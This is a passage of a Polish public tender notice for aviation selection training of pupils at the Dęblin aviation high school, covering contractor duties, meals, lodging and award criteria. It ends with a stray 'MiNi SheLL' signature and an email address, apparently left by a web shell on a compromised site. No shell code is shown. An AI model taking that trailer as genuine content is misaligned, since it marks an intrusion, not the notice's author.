ścisłej współpracy z Zamawiającym,
udzielania informacji o stanie realizacji przedmiotu umowy na wniosek Zamawiającego,
 umożliwienia kontroli przebiegu szkolenia przez Zamawiającego,
przestrzegania zasady równości szans, w tym równości płci w czasie prowadzenia szkolenia, w ramach realizacji przedmiotu umowy,
przygotowanie raportu po zakończeniu szkolenia teoretycznego oraz szkolenia praktycznego każdej grupy szkoleniowej, który będzie zawierał w szczególności:
a)   imienne wskazanie uczestników szkolenia wraz z liczbą i chronometrażem lotów,
b) omówienie trudności, z jakimi spotkał się Wykonawca przy realizacji umowy 
      w odniesieniu również do każdego uczestnika szkolenia,
c)   uwagi zgłoszone przez uczestników szkolenia, co do treści szkolenia,
5. Wymagania dodatkowe stawiane Wykonawcy:
1) należyta staranność przy realizacji umowy,
2) zdobycie wszelkich informacji niezbędnych do prawidłowego przygotowanie oferty,
3) sprawdzenie i zweryfikowanie dostarczonych materiałów,
4) niezwłoczne informowanie Zamawiającego o ewentualnych błędach lub przeoczeniach.
6. Podczas szkolenia praktycznego, w powietrzu i na płycie lotniska Wykonawca odpowiada za bezpieczeństwo uczestników szkolenia.
7. Dowóz z miejsca zakwaterowania na pas startowy lotniska/ lądowiska na koszt Wykonawcy.
8.     Realizację tego zadania powinien wykonywać aeroklub posiadający doświadczenie w zakresie selekcyjnego szkolenia lotniczego dla potrzeb MON.
9.  Zgodnie ze Statutem Ogólnokształcącego Liceum Lotniczego im. Żwirki i Wigury w Dęblinie, uczniowi OLL, który uczestniczy w szkoleniu lotniczym podczas wakacji przysługuje całodzienne wyżywienie, zakwaterowanie w zakresie i na zasadach określonych dla żołnierzy pełniących służbę wojskową w charakterze kandydatów na żołnierzy zawodowych. Jeżeli aeroklub szkolący uczniów będzie znajdował się poza miastem Dęblin w trakcie szkolenia praktycznego zakwaterowanie i wyżywienie na koszt aeroklubu realizującego szkolenie 
10. Szkolenie teoretyczne odbędzie się w ciągu ok. 9 dni wolnych od zajęć szkolnych w salach wykładowych OLL -  przed terminem rozpoczęcia szkolenia praktycznego.
11. Szkolenie praktyczne powinno odbyć się w 3 grupach. Czas trwania szkolenia praktycznego to ok. 14 dni na poszczególną grupę. 
12. W przypadku, gdy aeroklub znajduje się poza miastem Dęblin, Wykonawca zobowiązuje się zapewnić całodzienne wyżywienie, według poniższych wymagań:
- posiłek całodzienny: ok. 4288 kcal 
   białko - 146 g, w tym białko zwierzęce - 80 g,
   tłuszcze - 142 g, w tym roślinne - 46 g,
   węglowodany - 605 g,
   wapń - 1350 mg,
   żelazo - 32 mg,
   magnez - 66 mg,
   witamina A - 1299 mg,
   witamina C - 185 mg.
składające się z następujących posiłków:
a)	śniadanie zawierające danie gorące, zimny bufet, dodatki: miód, dżem, masło pieczywo (bułki, różne gatunki chleba) itp. oraz napoje ciepłe: kawa, herbata,
b)	obiad składający się z dwóch dań (zupa, danie główne z dodatkami i surówkami) 
i napoju,
c)	kolacja zawierająca danie gorące i zimny bufet.
14. Zestawy obiadowe mogą się powtórzyć nie częściej niż  jeden raz w tygodniu. Godziny posiłków zostaną uzgodnione z Zamawiającym. Jeżeli temperatura powietrza planowana na następny dzień szkoleniowy będzie wynosić powyżej 25°C  Wykonawca zapewni zimne napoje zaspokajające potrzeby osób szkolonych.
15. W przypadku, gdy aeroklub znajduje się poza miastem Dęblin Wykonawca jest zobowiązany zapewnić uczestnikom szkolenia i opiekunom zakwaterowanie w obiekcie spełniającym, co najmniej wymagania dla schroniska młodzieżowego kategorii pierwszej określone w Rozporządzeniu Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (tekst jednolity: Dz.U. z dnia 10.02.2006r., nr 22, poz. 169, załącznik 5) z późn. zm. Dla opiekuna grupy musi być zapewniony samodzielny pokój.
16. Zamawiający zastrzega sobie możliwość zmniejszenia liczy uczestników szkolenia spadochronowego z przyczyn niezależnych od niego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.20.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com